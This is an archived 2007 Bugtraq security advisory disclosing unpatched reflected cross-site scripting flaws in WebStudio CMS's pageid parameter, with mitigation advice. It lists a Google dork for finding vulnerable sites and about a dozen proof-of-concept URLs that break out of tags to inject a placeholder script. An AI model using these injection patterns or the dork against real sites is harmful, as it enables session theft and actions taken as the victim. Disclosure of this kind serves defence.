lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 4 Jun 2007 11:36:06 -0000
From: glafkos@...il.com
To: bugtraq@...urityfocus.com
Subject: WebStudio Multiple XSS Vulnerabilities

Application:  WebStudio CMS

Vendors Url:  http://www.bdigital.biz

Bug Type:     Multiple URL Handling Remote Cross-Site Scripting Vulnerabilities

Exploitation: Remote

Severity: Less Critical 

Solution Status: Unpatched 

Introduction: WebStudio CMS is a web-based CMS system

Google Dork:  "Powered by WebStudio"


Description:

User-supplied input passed via the URL is not properly sanitised before it is being returned to the user in index.php?pageid=. This can be exploited to execute arbitrary script code in the security context of an affected website, as a result the code will be able to access any of the target user's cookies, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.


PoC:

http://[target]/?pageid=[XSS]
http://[target]/?pageid=</textarea>[XSS]
http://[target]/?pageid=</title>[XSS]
http://[target]/?pageid=-->[XSS]
http://[target]/?pageid=email@...ress.com[XSS]domain.com
http://[target]/?pageid=<body+onload=[XSS]
http://[target]/?pageid=</div>[XSS]
http://[target]/index.php?pageid=>'>[XSS]
http://[target]/index.php?pageid=</textarea>[XSS]
http://[target]/index.php?pageid=</title>[XSS]
http://[target]/index.php?pageid=-->[XSS]
http://[target]/index.php?pageid=email@...ress.com[XSS]domain.com
http://[target]/index.php?pageid=<body+onload=[XSS]
http://[target]/index.php?pageid=</div>[XSS]


Solution:

There was no vendor-supplied solution at the time of entry.

Edit source code manually to ensure user-supplied input is correctly sanitised.

Filter malicious characters and character sequences via a HTTP proxy or firewall with URL filtering capabilities.


Credits:

Glafkos Charalambous
glafkos (at) infosec (dot) org (dot) uk

Information Security Uncensored
InfoSEC.org.uk

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ